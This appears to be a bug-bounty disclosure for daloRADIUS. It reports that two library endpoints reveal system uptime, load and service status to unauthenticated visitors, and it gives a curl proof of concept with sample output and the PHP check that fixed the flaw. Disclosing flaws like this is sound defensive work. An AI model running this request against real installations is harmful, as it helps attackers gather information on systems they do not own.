Sensitive system information disclosure in lirantal/daloradius
Valid
Reported on
Dec 7th 2022
Description
An unauthenticated user can gather information on the remote system just by visiting the following endpoints:
- /library/exten-radius_server_info.php (which reveals pieces of information such as system uptime, CPU load, etc.)
- /library/exten-server_info.php (which reveals if mysql and/or freeradius are currently running)
Proof of Concept
$ curl http://<hostname>/library/exten-server_info.php
<h3>General Information</h3>
<table class='summarySection'>
<tr>
<td class='summaryKey'> Uptime </td>
<td class='summaryValue'><span class='sleft'>69 days 2 hours 24 minutes </span> </td>
</tr>
<tr>
<td class='summaryKey'> System Load </td>
<td class='summaryValue'><span class='sleft'>0.14 0.14 0.10<br/>Tasks: 29 total, 1 running, 28 sleeping, 0 stopped, 0 zombie<br/>%Cpu(s): 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st</span> </td>
</tr>
...
Impact
This vulnerability makes easier for an attacker to gather information on the system hosting an instance of the vulnerable web application.
Fix
The issues have been corrected in the master branch. In particular, at the very beginning of each vulnerable file - exten-server_info.php and exten-radius_server_info.php - the following lines of code implement an authorization check:
...
$extension_file = '/library/exten-server_info.php';
if (strpos($_SERVER['PHP_SELF'], $extension_file) !== false) {
header("Location: ../index.php");
exit;
}
...
We are processing your report and will contact the
lirantal/daloradius
team within 24 hours.
a year ago
We have contacted a member of the
lirantal/daloradius
team and are waiting to hear back
a year ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
The researcher's credibility has increased: +7
to join this conversation